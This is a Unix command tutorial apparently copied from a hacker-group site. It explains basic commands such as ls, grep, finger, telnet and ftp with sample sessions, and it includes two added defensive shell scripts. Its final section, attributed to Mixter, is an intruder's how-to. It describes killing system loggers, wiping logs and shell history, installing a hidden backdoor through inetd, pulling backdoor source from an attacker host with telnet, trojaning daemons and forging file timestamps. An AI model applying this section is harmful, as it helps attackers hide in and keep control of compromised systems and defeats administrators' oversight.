29699939-Dasar-Dasar-Perintah-Unix


BASIC UNIX COMMANDS
Source: korido-crew.tk

The following are some Unix commands that I took from a neighbouring forum. The various Unix clones (BSD, Linux, SunOS, System V, SCO, IRIX, AIX) are almost all alike in this respect. As an example I show how to run these commands on Linux; part of this I took from the Kecoak Elektronik tutorial and from the handy commands of the Israeli hacker Mixter.

:: CyberBug's tutorial

UNIX COMMANDS
Before going on, remember that in Linux/UNIX all commands are written in lowercase, and Linux/UNIX distinguishes upper and lower case.

------> ls

Remember the DIR command in DOS? This command is the DIR of Unix: it lists the files in a directory. ls also takes extra flags, which you can see by typing:

ls --help ; shows the built-in help

man ls ; man stands for manual, so this is the manual page for ls

Some common forms of ls are:

ls -l ; show extra information (l = long)

ls -a ; also show hidden files, i.e. names beginning with a dot (a = all)

ls -la ; both at once

The extra information shown by -l covers the user who owns the file, the date and time the file was last modified (not when it was created), the file's permissions, and more, for example:

rwxr-x--x

Note:

characters 1-3: user/owner permissions

characters 4-6: group permissions


characters 7-9: other permissions

This is what the letters mean:

r - read permission

w - write permission

x - (e)xecute permission

So in the example above:

the user/owner can read, write and execute the file; users in the same group as the owner can read and execute it; everyone else can only execute it. A - means that permission is absent. In full ls -l output the nine permission characters are preceded by a file-type character: d means the entry is a directory, - a regular file.
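The permission string above can be turned into the octal mode that chmod accepts, and the same parse spots the setuid/setgid/sticky letters (s, S, t, T) that ls folds into the execute column and that the note above does not cover. The shell functions below are an added example, not code from the CyberBug tutorial or from the Korido page; they assume a POSIX sh and also accept the 11-character form with a trailing . or + that ls prints when SELinux labels or ACLs are present.

```shell
#!/bin/sh
# Added example (not from the original tutorial): decode an ls -l mode string.

# mode_to_octal MODESTRING
# Accepts the 9-character permission string ("rwxr-x--x"), the 10-character
# ls -l form with the file-type column ("-rwsr-xr-x", "drwxrwxrwt"), or the
# 11-character form with a trailing "." or "+" (SELinux label / ACL marker).
# Prints the 4-digit octal mode, e.g. 4755.
# s/S (setuid, setgid) and t/T (sticky) sit in the execute column: lowercase
# means the execute bit is also set, uppercase means it is not.
mode_to_octal() {
    m=$1
    case $m in
        ??????????[.+]) m=${m%?} ;;       # drop SELinux/ACL marker
    esac
    case ${#m} in
        10) m=${m#?} ;;                   # drop file-type column (-, d, l, ...)
        9)  ;;
        *)  echo "bad mode string: $1" >&2; return 2 ;;
    esac
    special=0      # setuid=4, setgid=2, sticky=1
    perms=""
    weight=4       # owner column carries setuid, group setgid, other sticky
    while [ -n "$m" ]; do
        triplet=${m%"${m#???}"}           # next rwx group
        m=${m#???}
        digit=0
        case $triplet in r??) digit=$((digit + 4)) ;; esac
        case $triplet in ?w?) digit=$((digit + 2)) ;; esac
        case $triplet in ??[xst]) digit=$((digit + 1)) ;; esac
        case $triplet in ??[sStT]) special=$((special + weight)) ;; esac
        perms="$perms$digit"
        weight=$((weight / 2))
    done
    printf '%s%s\n' "$special" "$perms"
}

# mode_warnings MODESTRING
# Prints one line per security-relevant bit: setuid, setgid, world-writable.
# Prints nothing for an unremarkable mode such as rwxr-x--x.
mode_warnings() {
    oct=$(mode_to_octal "$1") || return 2
    case $oct in [4-7]???) echo setuid ;; esac
    case $oct in [2367]???) echo setgid ;; esac
    case $oct in ???[2367]) echo world-writable ;; esac
}

# The string from the tutorial, and a setuid binary as ls -l shows it
mode_to_octal rwxr-x--x      # 0751
mode_warnings -rwsr-xr-x     # setuid
```

Running mode_warnings over the first column of `ls -l /usr/bin` is a quick way to eyeball setuid binaries by hand; for a whole filesystem, `find / -perm -4000 -type f` answers the same question without parsing text.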

------> cat

cat (concatenate) is used to display and to write/create files, roughly like TYPE in DOS. To display a file's contents, type: cat filename. To create a file, type: cat > filename, type the contents, and finish with Ctrl+D (end of input), which closes the file. Ctrl+C also stops cat, but by killing it rather than ending the input. If filename already exists it is overwritten; if you want the data appended to the existing file instead, replace > with >>.

------> more

Displays a file's contents one screen at a time; press q to quit.

more jilid1.txt

------> grep

Displays every line that contains the wanted pattern.

grep kecoak jilid1.txt

shows every line of text in jilid1.txt that contains kecoak.

------> man

The UNIX help/manual; type man command to read a command's manual page.

man pwd

------> echo

echo is used to display what you type on the screen, e.g.:

echo "saya belajar linux"

saya belajar linux


or to create a file, e.g.:

echo "biff n" > .profile

which creates the file .profile in the current directory containing the text "biff n"; to append to the file instead, replace > with >>.

------> cp

copy, used to copy files.

cp jilid1.txt jilid1.txt.backup

cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup

------> mv

move, renames or moves a file or directory

mv jilid1.txt jilid1a.txt

mv backup bak

------> rm

remove, deletes files

rm jilid1.txt ; delete the file jilid1.txt

rm * ; delete every file in the current directory (careful: there is no undo)

------> cd

change directory, moves to another directory, same as CD in DOS

cd /root

note that Linux uses / (slash), not \ (backslash)

------> mkdir

make directory, creates a directory

mkdir backup

------> rmdir


remove directory, deletes a directory; the files inside it must be deleted first.

rmdir backup

------> who

who shows the users logged in to the system; the output looks something like this:

cyberservices:~$ who

root      tty1   Dec 20 17:47
cyberbug  tty2   Dec 20 17:48
cyberbug  tty3   Dec 20 17:48
cyberbug  ttyp0  Dec 20 18:43 (localhost)

The first column shows the user name, the second the terminal line in use, the third the login time and the fourth the host name or IP address they connected from; if it is empty, they are logged in directly at the console.

------> whoami

If you have forgotten who you are, this is the command: Who am I?

cyberservices:~$ whoami

cyberbug

------> who am i

This one is also for when you have lost track of yourself :)

cyberservices:~$ who am i

cyberservices!cyberbug tty3 Dec 20 17:48

------> pwd

Shows the current directory; pwd = print working directory, the command to use when you have wandered around and no longer know the way home


cyberservices:~$ pwd

/home/cyberbug

------> ps

Shows the active processes

cyberservices:~$ ps

  PID TTY STAT TIME COMMAND
   87  2  S    0:00 -bash
   88  3  S    0:00 -bash
 1440  2  S    0:00 pico jilid2.txt
 1443  3  R    0:00 ps

------> ping

Checks whether a host is up; for the technical terms see man ping

cyberservices:~$ ping localhost

PING localhost (127.0.0.1): 56 data bytes

64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms

64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms

64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms

64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

--- localhost ping statistics ---

5 packets transmitted, 5 packets received, 0% packet loss

round-trip min/avg/max = 0.1/0.1/0.2 ms

cyberservices:~$ ping 127.0.0.1


PING 127.0.0.1 (127.0.0.1): 56 data bytes

64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms

64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms

64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms

64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

--- 127.0.0.1 ping statistics ---

5 packets transmitted, 5 packets received, 0% packet loss

round-trip min/avg/max = 0.1/0.1/0.2 ms

cyberservices:~$

Note that localhost and 127.0.0.1 are the same thing:

127.0.0.1 is the local loopback address, provided for testing.

------> finger

Looks up information about users. Note that finger @host hands this list to anyone who can reach port 79 on the machine, which is why the finger daemon is disabled on most systems today.

cyberservices:~$ finger

Login     Name      Tty  Idle  Login Time    Office  Office Phone
cyberbug  CyberBug  2          Dec 22 01:10
cyberbug  CyberBug  3          Dec 22 01:10
root                1    1:37  Dec 22 01:10

cyberservices:~$ finger @cyberservices.com

[cyberservices.com]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00

Login     Name      Tty  Idle  Login Time    Office  Office Phone
cyberbug  CyberBug  2          Dec 22 01:10
cyberbug  CyberBug  3          Dec 22 01:10
root                1    1:39  Dec 22 01:10

cyberservices:~$ finger @localhost

[localhost]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00

Login     Name      Tty  Idle  Login Time    Office  Office Phone
cyberbug  CyberBug  2          Dec 22 01:10
cyberbug  CyberBug  3          Dec 22 01:10
root                1    1:40  Dec 22 01:10

cyberservices:~$ finger cyberbug

Login: cyberbug Name: CyberBug

Directory: /home/cyberbug Shell: /bin/bash

On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle

On since Tue Dec 22 01:10 (PHT) on tty3

Last login Tue Dec 22 01:13 (PHT) on tty4

Mail forwarded to "|IFS=' '&&exec /usr/bin/procmail -f-||exit 75

#cyberbug"

No mail.

No Plan.

cyberservices:~$ finger root


Login: root Name:

Directory: /root Shell: /bin/bash

On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle

Mail last read Tue Dec 15 09:19 1998 (PHT)

No Plan.

------> telnet

Communicates with another host over the telnet protocol. Everything in the session, the password included, crosses the network in cleartext, which is why telnet logins have since been replaced by ssh. The password below is shown only for the tutorial; a real login does not echo it.

cyberservices:~$ telnet localhost

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

Welcome to Linux 2.0.34.

cyberservices login: cyberbug

Password: 3m4nggu3p1k1r1n

Linux 2.0.34.

Last login: Tue Dec 22 01:13:52 on tty4.

No mail.

cyberservices:~$ telnet localhost 25

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998 03:52:51 +0800


helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to meet you
mail from: [email protected]
250 [email protected]... Sender ok
rcpt to: [email protected]
250 [email protected]... Recipient ok (will queue)
data
354 Enter mail, end with "." on a line by itself
Kukirim lagu dan salam rinduku
.
250 EAA01615 Message accepted for delivery
quit

cyberservices:~$ telnet localhost 110

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.
+OK cyberservices POP3 Server (Version 1.005l) ready at
user root
+OK please send PASS command
pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root
stat
+OK 2 7227
retr 1
quit

------> ftp

Runs the file transfer program


cyberservices:~$ ftp localhost

Connected to localhost.

220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.

Name (localhost:cyberbug): ftp

331 Guest login ok, send your complete e-mail address as password.

Password: [email protected]

230-Welcome, archive user! ... blah blah ... blah

230 Guest login ok, access restrictions apply.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp>

ftp can also be driven by hand by telnetting to port 21, since its control channel is plain text as well:

cyberservices:~$ telnet localhost 21

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.

------> talk

Talk to another user; for example, cyberbug requests a talk with root like this:

talk root

atau

talk [email protected]


[Waiting for your party to respond]

[Ringing your party again]

On root's terminal this message appears:

Message from Talk_Daemon@cyberservices at 4:00 ...

talk: connection requested by cyberbug@localhost.

talk: respond with: talk cyberbug@localhost

root must type talk cyberbug@localhost to answer the request

talk cyberbug@localhost

[Connection established]

:: Additional commands from me (r3v0lt aka Intruded)

1. Compiling a file

ex. #gcc -o outputname sourcefile

#gcc -o pscan pscan.c

2. Running an executable

ex. #./file

#./pscan

#./scaner.pl

#./scanner.sh

3. Stopping a process

ex. # Ctrl+C

4. Suspending a process

ex. # Ctrl+Z; to bring it back to the foreground, type fg (on FreeBSD, and in any other shell with job control)

5. Changing your shell (on FreeBSD)

ex. #chsh ---> ksh, bash, tcsh

6. Changing your password

ex. #passwd

7. Looking up a host's IP address

ex. #dig hostname

ex. #nslookup hostname

8. Editor

ex. #pico wepedodol.c

9. Pipes, two processes at once

ex. # ls -al | head

shows only the top of the directory listing; head reads the output of ls from the pipe, so it must not be given a file name, otherwise it reads that file and ignores ls

10. Changing the mode (permissions)

ex. #chmod +x file

r - read permission

w - write permission

x - (e)xecute permission

:: That's all for now, ok dear.....

::: Notes from our pal Mixter =

Here are my suggestions...

1. killall -9 syslogd klogd - pesky loggers! Only few admins will notice if they get turned off. Now you can act freely. Copy secure.1 and messages.1 from /var/log over secure and messages. Normally, these logs are the only ones with the intruder's IP and traces of a root compromise in them. If *.1 doesn't exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional.

2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf... Inform yourself about the frequency the system is being maintained, administrated, if the logfiles are being analyzed.

* Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you).

* Look if the system is already backdoored!! You might want to remove other backdoors.

* Look for a loghost or snmp (dangerous because you can't manipulate the logs on a far-away loghost). Watch out for *logd, sniffers, netmons etc. before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).

3. This is important: DON'T MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach to uploading files is doing:

(on your box)

$ uuencode -m backdoor.c backdoor.c | less

(on the target box)

uudecode

# cc -o backdoor backdoor.c

A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c. As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom ever used. So, when you want to re-activate your backdoor, [email protected] for a second, and your backdoor is running. You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.

4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm. If not, use ncftp to fetch the file anonymously, because it doesn't need user interaction. If you want, add an additional backdoor in your "patched" server. QPOP 2.53 even supports this itself. For all files you replace, you should modify the time stamps, which won't help if the admin uses tripwire or cksum, but if the admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. To modify timestamps, you do a simple:

touch -r /bin/bash /path/to/your/trojan

this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is to add an ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command to a rc.d script as well. Bind doesn't need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But be aware that this might get you detected, let's say if you disable port 110 or 143 on an ISP's central mail exchange server...

About your backdoor:

Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more.

For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system("w"), system("killall -9 syslogd klogd"), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5].
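The touch -r trick in point 4 has a weakness that the notes above do not mention, and it is the one a defender can use: touch rewrites a file's atime and mtime, but the inode change time (ctime) is stamped by the kernel whenever the inode is written and has no user-space setter, so a file whose mtime was copied from /bin/bash still carries a ctime from the moment it was planted. The shell functions below are an added example of that check, not code from Mixter or from the Korido page; they assume GNU coreutils stat (-c %Y for mtime, -c %Z for ctime) and a POSIX sh, and the demo layout at the end is constructed in a temporary directory.

```shell
#!/bin/sh
# Added example (not from Mixter's text): spot files whose mtime was copied or
# backdated with touch -r / touch -t. touch can set atime and mtime, but ctime
# (inode change time) is written by the kernel on every inode update and has
# no user-space setter, so a planted file keeps a ctime newer than its mtime.
# Assumes GNU coreutils stat: -c %Y = mtime, -c %Z = ctime, as epoch seconds.

# timestomp_check FILE [SLACK]
# Returns 0 when ctime and mtime agree within SLACK seconds (default 60),
# 1 when ctime is later than mtime by more than SLACK (suspect),
# 2 when FILE cannot be stat'ed.
timestomp_check() {
    file=$1
    slack=${2:-60}
    mtime=$(stat -c %Y "$file" 2>/dev/null) || return 2
    ctime=$(stat -c %Z "$file" 2>/dev/null) || return 2
    if [ $((ctime - mtime)) -gt "$slack" ]; then
        return 1
    fi
    return 0
}

# timestomp_scan DIR [SLACK]
# Prints the path of every regular file below DIR that fails the check.
# The loop reads a here-document rather than a pipe so it runs in the current
# shell; file names containing newlines are not handled.
timestomp_scan() {
    dir=$1
    slack=${2:-60}
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        rc=0
        timestomp_check "$f" "$slack" || rc=$?
        if [ "$rc" -eq 1 ]; then
            printf '%s\n' "$f"
        fi
    done <<EOF
$(find "$dir" -type f)
EOF
}

# Demo on a constructed layout: one freshly written file and one file whose
# mtime was copied with touch -r from a reference dated 2001, as in point 4.
timestomp_demo() {
    tmp=$(mktemp -d)
    mkdir "$tmp/scan"
    echo clean > "$tmp/scan/clean"
    touch -t 200101010000 "$tmp/reference"
    echo trojan > "$tmp/scan/trojan"
    touch -r "$tmp/reference" "$tmp/scan/trojan"
    timestomp_scan "$tmp/scan"          # prints only .../scan/trojan
    rm -rf "$tmp"
}
```

A ctime newer than mtime is a triage signal, not proof: package managers, tar -x and cp -p also preserve mtime while the kernel stamps a fresh ctime, so the suspects still have to be compared against the package database or a tripwire-style baseline, exactly the tools point 4 admits defeat the trick.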

Copied by Korido Crew

Source: Korido-crew.tk